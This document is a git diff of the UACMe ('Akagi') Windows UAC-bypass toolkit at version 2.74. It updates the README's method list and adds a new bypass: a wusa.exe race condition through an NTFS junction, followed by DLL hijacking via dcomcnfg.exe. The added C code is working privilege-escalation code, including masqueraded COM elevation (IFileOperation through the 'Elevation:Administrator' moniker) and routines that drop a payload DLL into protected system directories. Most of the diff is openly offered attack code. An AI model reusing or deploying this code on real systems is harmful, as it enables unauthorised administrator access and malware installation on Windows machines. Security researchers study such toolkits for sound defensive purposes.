diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe
index 359314e..b2ad6e4 100644
Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ
diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe
index 589d08b..d7242d7 100644
Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ
diff --git a/README.md b/README.md
index de55f61..c654831 100644
--- a/README.md
+++ b/README.md
@@ -244,9 +244,9 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
- * Fixed in: unfixed :see_no_evil:
- * How: -
+ * Works from: Windows 10 TH1 (10240)
+ * Fixed in: Windows 10 RS3 (16215)
+ * How: Shell API update
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
@@ -260,7 +260,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
+ * Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
32. Author: xi-tauw
@@ -276,7 +276,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined application
- * Works from: Windows 10 (10240)
+ * Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
34. Author: James Forshaw
@@ -297,11 +297,19 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible, see note
* Fixed in: unfixed :see_no_evil:
* How: -
+36. Author: Thomas Vanhoutte
+ * Type: Race condition
+ * Method: NTFS reparse point & Dll Hijack
+ * Target(s): wusa.exe
+ * Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll
+ * Works from: Windows 7 (7600)
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
* Method (11) implemented in x86-32 version;
-* Method (13) (19) and above implemented only in x64 version;
+* Method (13) (19) implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
* Method (30) require x64 because it abuses WOW64 subsystem feature;
diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc
index 7275d07..304d392 100644
Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ
diff --git a/Source/Akagi/bin/Akatsuki64.cd b/Source/Akagi/bin/Akatsuki64.cd
index 0d12cbd..97a78a2 100644
Binary files a/Source/Akagi/bin/Akatsuki64.cd and b/Source/Akagi/bin/Akatsuki64.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi32.cd b/Source/Akagi/bin/Ikazuchi32.cd
index 733b633..78eade9 100644
Binary files a/Source/Akagi/bin/Ikazuchi32.cd and b/Source/Akagi/bin/Ikazuchi32.cd differ
diff --git a/Source/Akagi/bin/Ikazuchi64.cd b/Source/Akagi/bin/Ikazuchi64.cd
index bf515b9..0100e4b 100644
Binary files a/Source/Akagi/bin/Ikazuchi64.cd and b/Source/Akagi/bin/Ikazuchi64.cd differ
diff --git a/Source/Akagi/bin/fubuki32.cd b/Source/Akagi/bin/fubuki32.cd
index d609808..78e2bc9 100644
Binary files a/Source/Akagi/bin/fubuki32.cd and b/Source/Akagi/bin/fubuki32.cd differ
diff --git a/Source/Akagi/bin/fubuki64.cd b/Source/Akagi/bin/fubuki64.cd
index eacd7d5..bd84ab3 100644
Binary files a/Source/Akagi/bin/fubuki64.cd and b/Source/Akagi/bin/fubuki64.cd differ
diff --git a/Source/Akagi/bin/hibiki32.cd b/Source/Akagi/bin/hibiki32.cd
index 84cfff6..9196ee7 100644
Binary files a/Source/Akagi/bin/hibiki32.cd and b/Source/Akagi/bin/hibiki32.cd differ
diff --git a/Source/Akagi/bin/hibiki64.cd b/Source/Akagi/bin/hibiki64.cd
index 3fc729e..51c29e7 100644
Binary files a/Source/Akagi/bin/hibiki64.cd and b/Source/Akagi/bin/hibiki64.cd differ
diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h
index 311fb15..3a618c2 100644
--- a/Source/Akagi/consts.h
+++ b/Source/Akagi/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 20 June 2017
*
* Global consts definition file.
*
@@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
+#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSSETTINGS L"Software\\Classes\\ms-settings"
#define T_SHELL_OPEN_COMMAND L"\\shell\\open\\command"
@@ -56,6 +57,7 @@
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
#define ELSEXT_DLL L"elsext.dll"
+#define GDIPLUS_DLL L"GdiPlus.dll"
#define HIBIKI_DLL L"Hibiki.dll"
#define KERNEL32_DLL L"kernel32.dll"
#define LOGPROVIDER_DLL L"LogProvider.dll"
@@ -80,6 +82,7 @@
#define CONSENT_EXE L"consent.exe"
#define CONTROL_EXE L"control.exe"
#define CREDWIZ_EXE L"credwiz.exe"
+#define DCOMCNFG_EXE L"dcomcnfg.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define EXPLORER_EXE L"explorer.exe"
#define FODHELPER_EXE L"fodhelper.exe"
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 428e3de..870881f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 24 May 2017
+* DATE: 10 June 2017
*
* Common header file for the program support routines.
*
@@ -37,6 +37,7 @@
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
+#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#define PAYLOAD_ID_NONE MAXDWORD
@@ -63,7 +64,7 @@
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
-#include "Shared\ldr.h"
+#include "shared\ldr.h"
#include "consts.h"
#include "compress.h"
#include "sup.h"
@@ -86,7 +87,7 @@ typedef struct _UACME_CONTEXT {
ULONG dwBuildNumber;
ULONG AkagiFlag;
ULONG IFileOperationFlags;
- ULONG OptionalParameterLength;
+ ULONG OptionalParameterLength; //count of characters
WCHAR szSystemDirectory[MAX_PATH + 1];//with end slash
WCHAR szTempDirectory[MAX_PATH + 1]; //with end slash
WCHAR szOptionalParameter[MAX_PATH + 1]; //limited to MAX_PATH
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index c79d1ae..6fb5d93 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
-* VERSION: 2.72
+* VERSION: 2.73
*
-* DATE: 26 May 2017
+* DATE: 08 June 2017
*
* Program entry point.
*
@@ -136,8 +136,8 @@ UINT ucmInit(
bytesIO = 0;
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO > 0) {
- g_ctx.OptionalParameterLength = bytesIO;
_strcpy(g_ctx.szOptionalParameter, szBuffer);
+ g_ctx.OptionalParameterLength = 1 + bytesIO; //including 0
}
wincls.cbSize = sizeof(WNDCLASSEX);
diff --git a/Source/Akagi/methods/carberp.c b/Source/Akagi/methods/carberp.c
index a668785..e6597a8 100644
--- a/Source/Akagi/methods/carberp.c
+++ b/Source/Akagi/methods/carberp.c
@@ -4,9 +4,9 @@
*
* TITLE: CARBERP.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 25 Mar 2017
+* DATE: 10 June 2017
*
* Tweaked Carberp methods.
* Original Carberp is exploiting mcx2prov.exe in ehome.
@@ -18,52 +18,6 @@
*
*******************************************************************************/
#include "global.h"
-#include "makecab.h"
-
-/*
-* ucmWusaExtractPackage
-*
-* Purpose:
-*
-* Extract cab to protected directory using wusa.
-* This routine expect source as ellocnak.msu cab file in the temp folder.
-*
-*/
-BOOL ucmWusaExtractPackage(
- _In_ LPWSTR lpTargetDirectory
-)
-{
- BOOL bResult = FALSE;
- SIZE_T Size;
- LPWSTR lpCommandLine = NULL;
- WCHAR szMsuFileName[MAX_PATH * 2];
-
- if (lpTargetDirectory == NULL)
- return FALSE;
-
- RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
- _strcpy(szMsuFileName, g_ctx.szTempDirectory);
- _strcat(szMsuFileName, ELLOCNAK_MSU);
-
- Size = ((1 + _strlen(lpTargetDirectory) +
- _strlen(szMsuFileName) +
- MAX_PATH) * sizeof(WCHAR));
-
- lpCommandLine = (LPWSTR)supHeapAlloc(Size);
- if (lpCommandLine) {
-
- _strcpy(lpCommandLine, L"/c wusa ");
- _strcat(lpCommandLine, szMsuFileName);
- _strcat(lpCommandLine, L" /extract:");
- _strcat(lpCommandLine, lpTargetDirectory);
-
- bResult = supRunProcess(CMD_EXE, lpCommandLine);
-
- supHeapFree(lpCommandLine);
- }
- DeleteFileW(szMsuFileName);
- return bResult;
-}
/*
* ucmWusaMethod
@@ -142,55 +96,5 @@ BOOL ucmWusaMethod(
} while (cond);
-
- return bResult;
-}
-
-/*
-* ucmCreateCabinetForSingleFile
-*
-* Purpose:
-*
-* Build cabinet for usage in methods where required 1 file.
-*
-*/
-BOOL ucmCreateCabinetForSingleFile(
- _In_ LPWSTR lpSourceDll,
- _In_ PVOID ProxyDll,
- _In_ DWORD ProxyDllSize
-)
-{
- BOOL cond = FALSE, bResult = FALSE;
- CABDATA *Cabinet = NULL;
- LPWSTR lpFileName;
- WCHAR szMsuFileName[MAX_PATH * 2];
-
- if ((ProxyDll == NULL) ||
- (ProxyDllSize == 0) ||
- (lpSourceDll == NULL)) return bResult;
-
- do {
-
- //drop proxy dll
- if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
- break;
- }
-
- //build cabinet
- RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
- _strcpy(szMsuFileName, g_ctx.szTempDirectory);
- _strcat(szMsuFileName, ELLOCNAK_MSU);
-
- Cabinet = cabCreate(szMsuFileName);
- if (Cabinet == NULL)
- break;
-
- lpFileName = _filename(lpSourceDll);
- //put file without compression
- bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
- cabClose(Cabinet);
-
- } while (cond);
-
return bResult;
}
diff --git a/Source/Akagi/methods/carberp.h b/Source/Akagi/methods/carberp.h
index ed34b7d..63b37c4 100644
--- a/Source/Akagi/methods/carberp.h
+++ b/Source/Akagi/methods/carberp.h
@@ -4,9 +4,9 @@
*
* TITLE: CARBERP.H
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 25 Mar 2017
+* DATE: 10 June 2017
*
* Prototypes and definitions for Carberp method.
*
@@ -22,11 +22,3 @@ BOOL ucmWusaMethod(
_In_ UCM_METHOD Method,
PVOID ProxyDll,
DWORD ProxyDllSize);
-
-BOOL ucmWusaExtractPackage(
- _In_ LPWSTR lpTargetDirectory);
-
-BOOL ucmCreateCabinetForSingleFile(
- _In_ LPWSTR lpSourceDll,
- _In_ PVOID ProxyDll,
- _In_ DWORD ProxyDllSize);
diff --git a/Source/Akagi/methods/comfileop.c b/Source/Akagi/methods/comfileop.c
new file mode 100644
index 0000000..23bf382
--- /dev/null
+++ b/Source/Akagi/methods/comfileop.c
@@ -0,0 +1,333 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: COMFILEOP.C
+*
+* VERSION: 2.74
+*
+* DATE: 10 June 2017
+*
+* IFileOperation based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+
+/*
+* ucmMasqueradedCoGetObjectElevate
+*
+* Purpose:
+*
+* CoGetObject elevation as admin.
+*
+*/
+HRESULT ucmMasqueradedCoGetObjectElevate(
+ _In_ LPWSTR clsid,
+ _In_ DWORD dwClassContext,
+ _In_ REFIID riid,
+ _Outptr_ void **ppv
+)
+{
+ HRESULT r = E_FAIL;
+ BIND_OPTS3 bop;
+ WCHAR szElevationMoniker[MAX_PATH];
+
+ if (clsid == NULL)
+ return r;
+
+ if (_strlen(clsid) > 64)
+ return r;
+
+ RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
+
+ _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
+ _strcat(szElevationMoniker, clsid);
+
+ RtlSecureZeroMemory(&bop, sizeof(bop));
+ bop.cbStruct = sizeof(bop);
+ bop.dwClassContext = dwClassContext;
+
+ return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
+}
+
+/*
+* ucmMasqueradedRenameElementCOM
+*
+* Purpose:
+*
+* Rename file/directory autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedRenameElementCOM(
+ _In_ LPWSTR OldName,
+ _In_ LPWSTR NewName
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *psiDestDir = NULL;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((OldName == NULL) || (NewName == NULL))
+ break;
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK) {
+ break;
+ }
+
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ psiDestDir = NULL;
+
+ bResult = TRUE;
+
+ } while (bCond);
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ if (psiDestDir != NULL) {
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ }
+
+ return bResult;
+}
+
+/*
+* ucmMasqueradedCreateSubDirectoryCOM
+*
+* Purpose:
+*
+* Create directory autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedCreateSubDirectoryCOM(
+ _In_ LPWSTR ParentDirectory,
+ _In_ LPWSTR SubDirectory
+)
+{
+ BOOL bCond = FALSE, bResult = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *psiDestDir = NULL;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((SubDirectory == NULL) || (ParentDirectory == NULL))
+ break;
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK) {
+ break;
+ }
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
+ if (r != S_OK) {
+ break;
+ }
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK) {
+ break;
+ }
+
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ psiDestDir = NULL;
+
+ bResult = TRUE;
+
+ } while (bCond);
+
+ if (FileOperation1 != NULL) {
+ FileOperation1->lpVtbl->Release(FileOperation1);
+ }
+
+ if (psiDestDir != NULL) {
+ psiDestDir->lpVtbl->Release(psiDestDir);
+ }
+
+ return bResult;
+}
+
+/*
+* ucmMasqueradedMoveCopyFileCOM
+*
+* Purpose:
+*
+* Move or Copy file autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedMoveCopyFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir,
+ _In_ BOOL fMove
+)
+{
+ BOOL cond = FALSE;
+ IFileOperation *FileOperation1 = NULL;
+ IShellItem *isrc = NULL, *idst = NULL;
+ SHELLEXECUTEINFOW shexec;
+ HRESULT r = E_FAIL;
+
+ do {
+
+ if ((SourceFileName == NULL) || (DestinationDir == NULL))
+ break;
+
+ RtlSecureZeroMemory(&shexec, sizeof(shexec));
+
+ r = CoCreateInstance(&CLSID_FileOperation, NULL,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
+
+ if (r != S_OK)
+ break;
+
+ if (FileOperation1 != NULL)
+ FileOperation1->lpVtbl->Release(FileOperation1);
+
+ r = ucmMasqueradedCoGetObjectElevate(
+ T_CLSID_FileOperation,
+ CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
+ &IID_IFileOperation,
+ &FileOperation1);
+
+ if (r != S_OK)
+ break;
+
+ if (FileOperation1 == NULL) {
+ r = E_FAIL;
+ break;
+ }
+
+ FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
+
+ r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
+ if (r != S_OK)
+ break;
+
+ r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
+ if (r != S_OK)
+ break;
+
+ if (fMove)
+ r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
+ else
+ r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
+
+ if (r != S_OK)
+ break;
+
+ r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
+ if (r != S_OK)
+ break;
+
+ idst->lpVtbl->Release(idst);
+ idst = NULL;
+ isrc->lpVtbl->Release(isrc);
+ isrc = NULL;
+
+ } while (cond);
+
+ if (FileOperation1 != NULL)
+ FileOperation1->lpVtbl->Release(FileOperation1);
+
+ if (isrc != NULL)
+ isrc->lpVtbl->Release(isrc);
+
+ if (idst != NULL)
+ idst->lpVtbl->Release(idst);
+
+ return (SUCCEEDED(r));
+}
+
+/*
+* ucmMasqueradedMoveFileCOM
+*
+* Purpose:
+*
+* Move file autoelevated.
+* This function expects that supMasqueradeProcess was called on process initialization.
+*
+*/
+BOOL ucmMasqueradedMoveFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir
+)
+{
+ return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
+}
diff --git a/Source/Akagi/methods/comfileop.h b/Source/Akagi/methods/comfileop.h
new file mode 100644
index 0000000..43cc969
--- /dev/null
+++ b/Source/Akagi/methods/comfileop.h
@@ -0,0 +1,42 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2017
+*
+* TITLE: COMFILEOP.H
+*
+* VERSION: 2.74
+*
+* DATE: 10 June 2017
+*
+* Prototypes and definitions for IFileOperation based routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+HRESULT ucmMasqueradedCoGetObjectElevate(
+ _In_ LPWSTR clsid,
+ _In_ DWORD dwClassContext,
+ _In_ REFIID riid,
+ _Outptr_ void **ppv);
+
+BOOL ucmMasqueradedCreateSubDirectoryCOM(
+ _In_ LPWSTR ParentDirectory,
+ _In_ LPWSTR SubDirectory);
+
+BOOL ucmMasqueradedMoveCopyFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir,
+ _In_ BOOL fMove);
+
+BOOL ucmMasqueradedMoveFileCOM(
+ _In_ LPWSTR SourceFileName,
+ _In_ LPWSTR DestinationDir);
+
+BOOL ucmMasqueradedRenameElementCOM(
+ _In_ LPWSTR OldName,
+ _In_ LPWSTR NewName);
diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c
index 4510c90..26b8ada 100644
--- a/Source/Akagi/methods/enigma0x3.c
+++ b/Source/Akagi/methods/enigma0x3.c
@@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@@ -62,7 +62,7 @@ BOOL ucmHijackShellCommandMethod(
sz = 0x1000;
}
else {
- sz = _strlen(lpszPayload) * sizeof(WCHAR);
+ sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)
@@ -162,7 +162,8 @@ DWORD ucmDiskCleanupWorkerThread(
InitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
- status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE,
+ status = NtCreateFile(&hDirectory,
+ FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
@@ -171,8 +172,7 @@ DWORD ucmDiskCleanupWorkerThread(
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
- 0
- );
+ 0);
if (!NT_SUCCESS(status))
break;
@@ -362,7 +362,7 @@ BOOL ucmAppPathMethod(
sz = 0x1000;
}
else {
- sz = _strlen(lpszPayload) * sizeof(WCHAR);
+ sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c
index 8c04620..d64bfc5 100644
--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 20 June 2017
*
* Hybrid UAC bypass methods.
*
@@ -1738,3 +1738,136 @@ BOOL ucmUiAccessMethod(
return bResult;
}
+
+/*
+* ucmJunctionMethod
+*
+* Purpose:
+*
+* Bypass UAC using two different steps:
+*
+* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.
+* 2) Dll hijack dotnet dependencies.
+*
+* Wusa race condition in combination with junctions found by Thomas Vanhoutte.
+* Twitter: https://twitter.com/SandboxEscaper
+* Blog: https://thomas-vanhoutte.blogspot.be
+*
+*/
+BOOL ucmJunctionMethod(
+ PVOID ProxyDll,
+ DWORD ProxyDllSize
+)
+{
+ BOOL bResult = FALSE, bDropComplete = FALSE, bCond = FALSE;
+ HKEY hKey = NULL;
+ LRESULT lResult;
+
+ LPWSTR lpTargetDirectory = NULL, lpEnd = NULL;
+
+ DWORD i, cValues = 0, cbMaxValueNameLen = 0, bytesIO;
+
+ WCHAR szBuffer[MAX_PATH * 2];
+ WCHAR szSource[MAX_PATH * 2];
+
+ do {
+
+ //
+ // Drop payload dll to %temp% and make cab for it.
+ //
+ RtlSecureZeroMemory(szSource, sizeof(szSource));
+ _strcpy(szSource, g_ctx.szTempDirectory);
+
+ if (g_ctx.dwBuildNumber < 9600) {
+ _strcat(szSource, OLE32_DLL);
+ }
+ else {
+ _strcat(szSource, MSCOREE_DLL);
+ }
+ if (!ucmCreateCabinetForSingleFile(szSource, ProxyDll, ProxyDllSize))
+ break;
+
+ //
+ // Locate target directory.
+ //
+ lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_DOTNET_CLIENT, 0, MAXIMUM_ALLOWED, &hKey);
+ if (lResult != ERROR_SUCCESS)
+ break;
+
+ lResult = RegQueryInfoKey(hKey,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ NULL,
+ &cValues,
+ &cbMaxValueNameLen,
+ NULL,
+ NULL,
+ NULL);
+
+ if (lResult != ERROR_SUCCESS)
+ break;
+
+ if ((cValues == 0) || (cbMaxValueNameLen == 0))
+ break;
+
+ if (cbMaxValueNameLen > MAX_PATH)
+ break;
+
+ bDropComplete = FALSE;
+
+ //
+ // Drop file in each.
+ //
+ for (i = 0; i < cValues; i++) {
+
+ RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
+ bytesIO = MAX_PATH;
+
+ lResult = RegEnumValue(hKey,
+ i,
+ (LPWSTR)&szBuffer,
+ &bytesIO,
+ NULL,
+ NULL,
+ NULL,
+ NULL);
+
+ lpTargetDirectory = _filepath(szBuffer, szBuffer);
+ if (lpTargetDirectory == NULL) {
+ bDropComplete = FALSE;
+ break;
+ }
+
+ lpEnd = _strend(lpTargetDirectory);
+ if (*(lpEnd - 1) == TEXT('\\'))
+ *(lpEnd - 1) = TEXT('\0');
+
+ if (!ucmWusaExtractViaJunction(lpTargetDirectory)) {
+ bDropComplete = FALSE;
+ break;
+ }
+
+ bDropComplete = TRUE;
+ }
+
+ if (!bDropComplete)
+ break;
+
+ //
+ // Exploit dll hijacking.
+ //
+ RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
+ _strcpy(szBuffer, g_ctx.szSystemDirectory);
+ _strcat(szBuffer, DCOMCNFG_EXE);
+ bResult = supRunProcess(szBuffer, NULL);
+
+ } while (bCond);
+
+ if (hKey != NULL)
+ RegCloseKey(hKey);
+
+ return bResult;
+}
diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h
index 7765862..0bbbc50 100644
--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 06 May 2017
+* DATE: 20 June 2017
*
* Prototypes and definitions for hybrid methods.
*
@@ -96,3 +96,7 @@ BOOL ucmWow64LoggerMethod(
BOOL ucmUiAccessMethod(
PVOID ProxyDll,
DWORD ProxyDllSize);
+
+BOOL ucmJunctionMethod(
+ PVOID ProxyDll,
+ DWORD ProxyDllSize);
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index f73413d..14f182b 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
-* VERSION: 2.73
+* VERSION: 2.74
*
-* DATE: 27 May 2017
+* DATE: 20 June 2017
*
* UAC bypass dispatch.
*
@@ -47,6 +47,7 @@ UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodTokenMod);
+UCM_API(MethodJunction);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@@ -78,13 +79,14 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
